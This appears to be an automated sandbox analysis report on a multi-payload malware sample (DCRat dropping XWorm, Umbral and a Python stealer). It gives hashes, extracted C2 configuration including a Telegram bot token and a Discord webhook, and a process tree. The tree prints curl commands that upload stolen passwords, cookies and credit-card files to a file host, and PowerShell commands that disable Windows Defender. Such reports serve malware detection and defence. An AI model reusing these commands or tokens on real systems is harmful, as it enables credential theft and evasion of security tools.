Analysis
-
max time kernel
119s -
max time network
143s -
platform
windows7_x64 -
resource
win7-20240419-en -
resource tags
arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system -
submitted
22-06-2024 15:54
Behavioral task
behavioral1
Sample
DCRat.exe
Resource
win7-20240419-en
Behavioral task
behavioral2
Sample
DCRat.exe
Resource
win10v2004-20240508-en
General
-
Target
DCRat.exe
-
Size
15.0MB
-
MD5
d4adfcf9065296e31a49327ebe642584
-
SHA1
83f527cdb0868e772c0538fe64c68e71e8e38669
-
SHA256
d958d55003daa3b5e322a920126104fbd93663b46803c8653aa0240aa1e80244
-
SHA512
10942a219ec55be6c7324f1962fccff1281d0870b906bab03622d6803426db26fd3702ce350e4b05dae761031df155ff1248eb44a9fe627522f03a848f6c0929
-
SSDEEP
393216:NdiQoFnY61ZmZZBFGndTMXdPpLNGxrkLzgTTP5b:NdiQoFnY61ZmXBFGdfrUIx
Malware Config
Extracted
xworm
-
Install_directory
%Temp%
-
install_file
update.exe
-
pastebin_url
https://pastebin.com/raw/CNZj0axn
-
telegram
https://api.telegram.org/bot7009114103:AAGQ9PxSyhh1FE2I9esEeyfU9zAsNkooOqo/sendMessage?chat_id=1180155027
Extracted
umbral
https://discord.com/api/webhooks/1248497570939011083/iys0Q-I2H74ZeU8iK8mxnadLGnKvFVeC_daDGNMshULRzjYbAnJMv_etelbvONsTKIUG
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Detect Umbral payload 3 IoCs
resource yara_rule behavioral1/files/0x0008000000013a15-90.dat family_umbral behavioral1/memory/2400-111-0x0000000000AE0000-0x0000000000B20000-memory.dmp family_umbral behavioral1/memory/1764-100-0x0000000000400000-0x00000000012FD000-memory.dmp family_umbral -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x0038000000013362-10.dat family_xworm behavioral1/memory/2228-19-0x0000000001330000-0x0000000001348000-memory.dmp family_xworm -
resource yara_rule behavioral1/memory/1764-100-0x0000000000400000-0x00000000012FD000-memory.dmp dcrat -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2080 powershell.exe 2252 powershell.exe 748 powershell.exe 2868 powershell.exe 1752 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Umbral.exe -
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe creal.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk XWorm.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk XWorm.exe -
Executes dropped EXE 5 IoCs
pid Process 2084 SHEETRAT.exe 2228 XWorm.exe 3068 creal.exe 2400 Umbral.exe 2428 creal.exe -
Loads dropped DLL 45 IoCs
pid Process 1764 DCRat.exe 1764 DCRat.exe 1764 DCRat.exe 1764 DCRat.exe 3068 creal.exe 2428 creal.exe 2428 creal.exe 2428 creal.exe 2428 creal.exe 2428 creal.exe 2428 creal.exe 2428 creal.exe 2428 creal.exe 2428 creal.exe 2428 creal.exe 2428 creal.exe 2428 creal.exe 2428 creal.exe 2428 creal.exe 2428 creal.exe 2428 creal.exe 2428 creal.exe 2428 creal.exe 2428 creal.exe 2428 creal.exe 2428 creal.exe 2428 creal.exe 2428 creal.exe 2428 creal.exe 2428 creal.exe 2428 creal.exe 2428 creal.exe 2428 creal.exe 2428 creal.exe 2428 creal.exe 2428 creal.exe 2428 creal.exe 2428 creal.exe 2428 creal.exe 2428 creal.exe 2428 creal.exe 2428 creal.exe 2428 creal.exe 2428 creal.exe 2428 creal.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\update = "C:\\Users\\Admin\\AppData\\Local\\Temp\\update.exe" XWorm.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 29 IoCs
flow ioc 14 discord.com 16 discord.com 21 discord.com 23 discord.com 40 discord.com 11 discord.com 35 discord.com 39 discord.com 46 pastebin.com 32 discord.com 13 discord.com 18 discord.com 41 discord.com 10 discord.com 37 discord.com 43 discord.com 12 discord.com 44 discord.com 34 discord.com 25 discord.com 20 discord.com 38 discord.com 45 pastebin.com 15 discord.com 22 discord.com 33 discord.com 36 discord.com 42 discord.com 19 discord.com -
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 5 api.ipify.org 27 ip-api.com 29 ip-api.com 4 api.ipify.org -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral1/files/0x00090000000134f5-14.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 3020 wmic.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 2012 tasklist.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2416 PING.EXE -
Suspicious behavior: EnumeratesProcesses 21 IoCs
pid Process 2400 Umbral.exe 2080 powershell.exe 1508 powershell.exe 2856 powershell.exe 408 powershell.exe 2252 powershell.exe 748 powershell.exe 2868 powershell.exe 1752 powershell.exe 2964 powershell.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2228 XWorm.exe Token: SeDebugPrivilege 2400 Umbral.exe Token: SeDebugPrivilege 2012 tasklist.exe Token: SeIncreaseQuotaPrivilege 2816 wmic.exe Token: SeSecurityPrivilege 2816 wmic.exe Token: SeTakeOwnershipPrivilege 2816 wmic.exe Token: SeLoadDriverPrivilege 2816 wmic.exe Token: SeSystemProfilePrivilege 2816 wmic.exe Token: SeSystemtimePrivilege 2816 wmic.exe Token: SeProfSingleProcessPrivilege 2816 wmic.exe Token: SeIncBasePriorityPrivilege 2816 wmic.exe Token: SeCreatePagefilePrivilege 2816 wmic.exe Token: SeBackupPrivilege 2816 wmic.exe Token: SeRestorePrivilege 2816 wmic.exe Token: SeShutdownPrivilege 2816 wmic.exe Token: SeDebugPrivilege 2816 wmic.exe Token: SeSystemEnvironmentPrivilege 2816 wmic.exe Token: SeRemoteShutdownPrivilege 2816 wmic.exe Token: SeUndockPrivilege 2816 wmic.exe Token: SeManageVolumePrivilege 2816 wmic.exe Token: 33 2816 wmic.exe Token: 34 2816 wmic.exe Token: 35 2816 wmic.exe Token: SeIncreaseQuotaPrivilege 2816 wmic.exe Token: SeSecurityPrivilege 2816 wmic.exe Token: SeTakeOwnershipPrivilege 2816 wmic.exe Token: SeLoadDriverPrivilege 2816 wmic.exe Token: SeSystemProfilePrivilege 2816 wmic.exe Token: SeSystemtimePrivilege 2816 wmic.exe Token: SeProfSingleProcessPrivilege 2816 wmic.exe Token: SeIncBasePriorityPrivilege 2816 wmic.exe Token: SeCreatePagefilePrivilege 2816 wmic.exe Token: SeBackupPrivilege 2816 wmic.exe Token: SeRestorePrivilege 2816 wmic.exe Token: SeShutdownPrivilege 2816 wmic.exe Token: SeDebugPrivilege 2816 wmic.exe Token: SeSystemEnvironmentPrivilege 2816 wmic.exe Token: SeRemoteShutdownPrivilege 2816 wmic.exe Token: SeUndockPrivilege 2816 wmic.exe Token: SeManageVolumePrivilege 2816 wmic.exe Token: 33 2816 wmic.exe Token: 34 2816 wmic.exe Token: 35 2816 wmic.exe Token: SeDebugPrivilege 2080 powershell.exe Token: SeDebugPrivilege 1508 powershell.exe Token: SeDebugPrivilege 2856 powershell.exe Token: SeDebugPrivilege 408 powershell.exe Token: SeDebugPrivilege 2252 powershell.exe Token: SeDebugPrivilege 748 powershell.exe Token: SeDebugPrivilege 2868 powershell.exe Token: SeDebugPrivilege 1752 powershell.exe Token: SeIncreaseQuotaPrivilege 1704 wmic.exe Token: SeSecurityPrivilege 1704 wmic.exe Token: SeTakeOwnershipPrivilege 1704 wmic.exe Token: SeLoadDriverPrivilege 1704 wmic.exe Token: SeSystemProfilePrivilege 1704 wmic.exe Token: SeSystemtimePrivilege 1704 wmic.exe Token: SeProfSingleProcessPrivilege 1704 wmic.exe Token: SeIncBasePriorityPrivilege 1704 wmic.exe Token: SeCreatePagefilePrivilege 1704 wmic.exe Token: SeBackupPrivilege 1704 wmic.exe Token: SeRestorePrivilege 1704 wmic.exe Token: SeShutdownPrivilege 1704 wmic.exe Token: SeDebugPrivilege 1704 wmic.exe -
Suspicious use of FindShellTrayWindow 37 IoCs
pid Process 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe -
Suspicious use of SendNotifyMessage 37 IoCs
pid Process 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe 1960 taskmgr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1764 wrote to memory of 2084 1764 DCRat.exe 28 PID 1764 wrote to memory of 2084 1764 DCRat.exe 28 PID 1764 wrote to memory of 2084 1764 DCRat.exe 28 PID 1764 wrote to memory of 2084 1764 DCRat.exe 28 PID 1764 wrote to memory of 2228 1764 DCRat.exe 29 PID 1764 wrote to memory of 2228 1764 DCRat.exe 29 PID 1764 wrote to memory of 2228 1764 DCRat.exe 29 PID 1764 wrote to memory of 2228 1764 DCRat.exe 29 PID 1764 wrote to memory of 3068 1764 DCRat.exe 30 PID 1764 wrote to memory of 3068 1764 DCRat.exe 30 PID 1764 wrote to memory of 3068 1764 DCRat.exe 30 PID 1764 wrote to memory of 3068 1764 DCRat.exe 30 PID 1764 wrote to memory of 2400 1764 DCRat.exe 31 PID 1764 wrote to memory of 2400 1764 DCRat.exe 31 PID 1764 wrote to memory of 2400 1764 DCRat.exe 31 PID 1764 wrote to memory of 2400 1764 DCRat.exe 31 PID 3068 wrote to memory of 2428 3068 creal.exe 32 PID 3068 wrote to memory of 2428 3068 creal.exe 32 PID 3068 wrote to memory of 2428 3068 creal.exe 32 PID 3068 wrote to memory of 2428 3068 creal.exe 32 PID 2428 wrote to memory of 1936 2428 creal.exe 41 PID 2428 wrote to memory of 1936 2428 creal.exe 41 PID 2428 wrote to memory of 1936 2428 creal.exe 41 PID 2428 wrote to memory of 1936 2428 creal.exe 41 PID 1936 wrote to memory of 2012 1936 cmd.exe 36 PID 1936 wrote to memory of 2012 1936 cmd.exe 36 PID 1936 wrote to memory of 2012 1936 cmd.exe 36 PID 1936 wrote to memory of 2012 1936 cmd.exe 36 PID 2428 wrote to memory of 2784 2428 creal.exe 37 PID 2428 wrote to memory of 2784 2428 creal.exe 37 PID 2428 wrote to memory of 2784 2428 creal.exe 37 PID 2428 wrote to memory of 2784 2428 creal.exe 37 PID 2428 wrote to memory of 1500 2428 creal.exe 39 PID 2428 wrote to memory of 1500 2428 creal.exe 39 PID 2428 wrote to memory of 1500 2428 creal.exe 39 PID 2428 wrote to memory of 1500 2428 creal.exe 39 PID 2428 wrote to memory of 1936 2428 creal.exe 41 PID 2428 wrote to memory of 1936 2428 creal.exe 41 PID 2428 wrote to memory of 1936 2428 creal.exe 41 PID 2428 wrote to memory of 1936 2428 creal.exe 41 PID 2428 wrote to memory of 1076 2428 creal.exe 43 PID 2428 wrote to memory of 1076 2428 creal.exe 43 PID 2428 wrote to memory of 1076 2428 creal.exe 43 PID 2428 wrote to memory of 1076 2428 creal.exe 43 PID 2428 wrote to memory of 1816 2428 creal.exe 45 PID 2428 wrote to memory of 1816 2428 creal.exe 45 PID 2428 wrote to memory of 1816 2428 creal.exe 45 PID 2428 wrote to memory of 1816 2428 creal.exe 45 PID 2428 wrote to memory of 2180 2428 creal.exe 47 PID 2428 wrote to memory of 2180 2428 creal.exe 47 PID 2428 wrote to memory of 2180 2428 creal.exe 47 PID 2428 wrote to memory of 2180 2428 creal.exe 47 PID 2400 wrote to memory of 2816 2400 Umbral.exe 49 PID 2400 wrote to memory of 2816 2400 Umbral.exe 49 PID 2400 wrote to memory of 2816 2400 Umbral.exe 49 PID 2400 wrote to memory of 2200 2400 Umbral.exe 51 PID 2400 wrote to memory of 2200 2400 Umbral.exe 51 PID 2400 wrote to memory of 2200 2400 Umbral.exe 51 PID 2400 wrote to memory of 2080 2400 Umbral.exe 53 PID 2400 wrote to memory of 2080 2400 Umbral.exe 53 PID 2400 wrote to memory of 2080 2400 Umbral.exe 53 PID 2400 wrote to memory of 1508 2400 Umbral.exe 55 PID 2400 wrote to memory of 1508 2400 Umbral.exe 55 PID 2400 wrote to memory of 1508 2400 Umbral.exe 55 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2200 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\DCRat.exe"C:\Users\Admin\AppData\Local\Temp\DCRat.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1764 -
C:\Users\Admin\AppData\Local\Temp\SHEETRAT.exe"C:\Users\Admin\AppData\Local\Temp\SHEETRAT.exe"2⤵
- Executes dropped EXE
PID:2084
-
-
C:\Users\Admin\AppData\Local\Temp\XWorm.exe"C:\Users\Admin\AppData\Local\Temp\XWorm.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:2228 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2252
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XWorm.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:748
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\update.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2868
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'update.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1752
-
-
-
C:\Users\Admin\AppData\Local\Temp\creal.exe"C:\Users\Admin\AppData\Local\Temp\creal.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Users\Admin\AppData\Local\Temp\creal.exe"C:\Users\Admin\AppData\Local\Temp\creal.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2428 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"4⤵
- Suspicious use of WriteProcessMemory
PID:1936 -
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2012
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile"4⤵PID:2784
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile"4⤵PID:1500
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile"4⤵PID:1936
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile"4⤵PID:1076
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile"4⤵PID:1816
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile"4⤵PID:2180
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2400 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2816
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"3⤵
- Views/modifies file attributes
PID:2200
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2080
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1508
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2856
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:408
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1704
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵PID:2208
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:2572
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2964
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:3020
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause3⤵PID:1568
-
C:\Windows\system32\PING.EXEping localhost4⤵
- Runs ping.exe
PID:2416
-
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1960
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
67KB
MD59b68c179ec2cd74ed1e458235f681002
SHA1bb237bc70cd208ef77400e7486246b225f07d8b4
SHA2568002fda4da20b6e09546487419e925555020cc6e037c20f3be23b3759d0f34d6
SHA512eb36e54bc0bb6d865a48bd938d670ab3615413a60b312e27854cb1a13dd17d667e0eb41a6ca29af6346f41f685218df84751e24763e18595f7defdbe24d07833
-
Filesize
8KB
MD53970c52465d267d2692c4ab1becbe436
SHA108559677f1d8d91616c09c206d3da44b69d740f4
SHA256da4c8c8ffa7238d9650651781626ff04582744d5b6a00d846aa80b5e9df36e7d
SHA512d7d3ad7982691c37c1779afa1b3ce40c9e898f9b9b0aceccc58bd587e122ece9783234884c809ea101dfbaddaf297e0e7ca51eb0d46f1cb496d909ea215e2e12
-
Filesize
84KB
MD5ae96651cfbd18991d186a029cbecb30c
SHA118df8af1022b5cb188e3ee98ac5b4da24ac9c526
SHA2561b372f064eacb455a0351863706e6326ca31b08e779a70de5de986b5be8069a1
SHA51242a58c17f63cf0d404896d3b4bb16b2c9270cc2192aa4c9be265ed3970dfc2a4115e1db08f35c39e403b4c918be4ed7d19d2e2e015cb06b33d26a6c6521556e7
-
Filesize
54KB
MD54e406cbfbfb77d6155b814e9f344165c
SHA18eddac97fe2e3dccc9d466c5d70d572ddeccd4ae
SHA25647998cdec5d134dd351947d94ad5ca5a234130d22dff7dae1a12b8c06daf2891
SHA5129519d3d729cb49bbf9b6889a096b2b6e2871a4ddb767b946f426871d89031aeb9bb993eff4add27909620a2647293dd59c4fba0e245e62eb62de04eb1615ddf7
-
Filesize
72KB
MD51c7f3f37a067019b7926c0f92f3a3aa7
SHA1ab6562aaa8cfa2dd49c1779a6374cecaf0e0d151
SHA256bbc7f102b547180ea8ca5ff496f1bd419bfefd360be15610ae6b08837076f5dc
SHA512840b095cdbb09b20f5d6db9962f4769734e0be425c9f094571df0df2d28888708072952792faded660c3e8f3db2513b6b42032e18cc681d909993fc6500b3e6e
-
Filesize
151KB
MD50430b925af08c2a400c9cdf6749215ca
SHA1e5d3876c057edbe0f3f7da99bef49be5dc1e6b4e
SHA2565e19921801974d6848952d982eac32e6f1be9f957e128c9e4c7e75b1ab091ad4
SHA512864cf27f74f75abfdbe9a17b76ed5dec62f2f82f3bafafa7a2403e5e37a04866951d83ab2683e3f5f0226d70ef8c4cc415296128684b94b916ce984114894b8a
-
Filesize
220KB
MD57bc3e402069caa8afb04f966e6f2b1cf
SHA18c0f9a0f189ff2f5a6a6c6a1ac8c2cf72afcb3ae
SHA25614a59911e349064e4be60dcbf3a0e60dc0f4c0eee2a406b69c9a24ddee3b60ab
SHA512bd74e6ecbda0e77c3665eb5dbd64a7f6194bcdcff838b9bb1bbeb1367c53491d41c0971602a14d2b4e615b6822f71382b9fe051c3be17464befa8dcf0f884ddd
-
Filesize
24KB
MD5f5bb0b71862c1011de7660e5e5721846
SHA14a3101719fa36f5b9165ef56af41208dfe3dc0e9
SHA256bc2e196bfb21a3f57ca86e96127b1246d47cdaeeb99f6239af38165bf42b5117
SHA512c794681be1da1acd87555c4b9550cc5f2cefa1b8458becb084aee034c2d7be90a44a4aeb0c0778560d16c80bb6c1e05c91fff208e0e550b06c7d7f46902b9e8c
-
Filesize
37KB
MD554c6149ab1c0a621b22be4f4046386b6
SHA11d2e8da6a76e6d2ba0b8fb70954d06fdef1ebc1e
SHA25644d896e8aa8887bad398b03dfdb8cf72aa3c0d87730a2ac0d92763722a426a7f
SHA51261e0c6571f90856baca950e9aac0835a0726e41e516fc3728c81117d9ee248cf0ab3d47c70b34906cbfd9e37583049b7307d53a8981361bdea1095e3f9271896
-
Filesize
66KB
MD552f6573b375929635fa819d706a593f1
SHA1b9b7c1342d7a807af9b4b3d07b6987ddc2311df2
SHA256cb64c605efecf4f788a23ad9da756fac3467ee320ff6b40369f731e95faca0da
SHA512149e4d7ce9c8067fd40088c12ede5bc7f4d6f34304410ea7806e375ecd2dc1c2a3a16691d7a1154513f0119bd61d8d510ac0fed113c32c441eeb66a298aba048
-
Filesize
108KB
MD58a2eb91cbd839da8813bb6dc5bd48178
SHA1f4a2aabcd226385e92ee78db753544bb9287556e
SHA2565ad15dbc726d002d356bfd7e6a077f8568fee463b7ce5f71c33a04b2e11558f1
SHA512dce0c6cf347516f989d3292d9f9541f585b6f04e04fb8a83bef6b6195310033c01588c129db006677ed2f0971634c84d79a5627db51b21de4e1b6e4f75a32a41
-
Filesize
822KB
MD5b55926dc5511d80851550d02cae2cdc3
SHA1d21ac6e9d040db750d152618e673e80f21c4a53d
SHA2566a8d109ef32019e5c6ae18e2ca48a5c0538be246a913a3d2d9dc9bd127807fa9
SHA5121b230365e44c60e2fa3448f41d5d0608f7ef89a724268399b4cdcf1e9a2cb3500dfcfbbcb717862cb3fb1a3d61ce7f6fa4e0cced0943f7e2be29fa49a7881a8b
-
Filesize
8KB
MD5ce9a43f60815b8d138e9d3de400d7173
SHA1e84e9ab3e34be3c370794e5e157ed48f7910ea9a
SHA256bb2bfaa8a2f2dd14b40658b3437a1ea684d67810da98b22985fc732b689f7909
SHA51259b50780a9d5009d6662e1698b121ed902cb42c15c53e08bf3d2a7cdbcff3c0f606403358b36c5fa233b56098dcfa97dd66878b77cf07ff5bd62bb277ab63563
-
Filesize
2.1MB
MD567c1ea1b655dbb8989a55e146761c202
SHA1aecc6573b0e28f59ea8fdd01191621dda6f228ed
SHA256541adbc9654d967491d11359a0e4ad4972d2bd25f260476dd7576c576478698a
SHA5121c7612c03df85b596dc360c1a94e367d8bfba51f651b49c598e4a066a693d9aa74195a40cc849ef787eac9b6e1e1fc079b389c03fc539e53abf4aa729bef5893
-
Filesize
28KB
MD5bc20614744ebf4c2b8acd28d1fe54174
SHA1665c0acc404e13a69800fae94efd69a41bdda901
SHA2560c7ec6de19c246a23756b8550e6178ac2394b1093e96d0f43789124149486f57
SHA5120c473e7070c72d85ae098d208b8d128b50574abebba874dda2a7408aea2aabc6c4b9018801416670af91548c471b7dd5a709a7b17e3358b053c37433665d3f6b
-
Filesize
524KB
MD59417e0d677e0f8b08398fcd57dccbafd
SHA1569e82788ff8206e3a43c8653d6421d456ff2a68
SHA256db16853dbc64f045ae2a972f7605a6f192d09b79cae86fd93b8434fa7d9e031f
SHA512b7dfd0b265c19d97518e638e4fcc19db3031382cda05c2cbb8965651ceadaa0f68f9d4dd62d542b2c9ef33d9703d50f4d74eb8b9f4918130895ef17feff2f6cb
-
Filesize
163KB
MD5e50093c4196ac6c3bd293789248477dd
SHA1fedc09eaa3c938461f96e8b3476c5239ea93a3fe
SHA256a8b218f57e82b57184b00c2ccc9cfd353a84ead0e777037a605427b4907fc69b
SHA512f5c05dbcb9dd4d5c0dc96f3af63023d6ee4760e0e55b839a673411fddd6a63896dd1aa4f4f2985e2853d8e54cc3ec61c83ceda2cffe849baa74221c477bc3992
-
Filesize
57KB
MD5ba32910ffd8a530fa69bc8f37828a6fd
SHA17bb0921ac27708082667fa3be05f08b6817cef7e
SHA2567fa7fef857b5787c355ecd8d1bec5eba28a5bc98f95dcc5130aebcfcfaa20bf4
